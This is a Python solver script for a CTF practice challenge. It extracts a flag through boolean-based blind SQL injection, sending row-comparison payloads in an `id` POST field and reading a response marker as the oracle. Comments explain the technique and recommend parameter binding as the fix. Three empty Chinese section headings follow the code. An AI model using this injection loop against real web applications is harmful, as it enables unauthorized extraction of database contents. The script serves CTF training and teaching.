February 20th, 2022
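import time

import requests

# Boolean-based blind SQL injection solver for a CTF practice instance.
#
# How the oracle works (as far as this script shows):
#   * The `id` POST field carries a SQL expression instead of a plain integer.
#   * `(select 1,'<guess>') > (select * from f1ag_1s_h3r3_hhhhh)` is a row
#     comparison, so the table's second column is compared against the guess
#     without its column name ever being written.
#   * The script treats the marker 'Nu1L' in the response body as "comparison
#     was true"; presumably that is the page rendered for id = 1.
#
# Defensive takeaway: the endpoint evaluates arbitrary SQL where a number is
# expected. Binding `id` as a query parameter (or casting it to an integer
# before use) removes the oracle; keyword blacklists do not.

# Empty strings mean no proxy is configured for either scheme.
proxies = {
    "http": "",
    "https": "",
}
url = 'http://4e6cb1dc-496c-4505-9ae9-747de7b583d0.node4.buuoj.cn:81/index.php'

# Character codes to try, in ascending order: '-' through ':' (45-58) and
# 'a' through '}' (97-125). Named `candidates` rather than `list` so the
# builtin is not shadowed.
candidates = [45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58,
              97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109,
              110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121,
              122, 123, 124, 125]

database = ''  # prefix recovered so far
flag = ''      # current guess: recovered prefix plus one candidate character

for _ in range(50):
    for code in candidates:
        flag = database + chr(code)
        print(flag)
        data = {'id': "0^((select 1,'{}')>(select * from f1ag_1s_h3r3_hhhhh))".format(flag)}
        print(data)
        # A timeout keeps one stalled connection from hanging the whole run.
        res = requests.post(url=url, proxies=proxies, data=data, timeout=10)
        if 'Nu1L' in res.text:
            # The first guess that compares greater has overshot by one, so
            # the character just below it is recorded.
            database += chr(code - 1)
            flag = ''
            break
        # Pause after each request that did not match, to pace the traffic.
        time.sleep(0.5)
    else:
        # No candidate compared greater: nothing more can be recovered with
        # this alphabet, so stop rather than repeat the same requests for
        # every remaining position.
        break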
0x01[使用场景]
0x02[原理解释]
0x03[例题示例]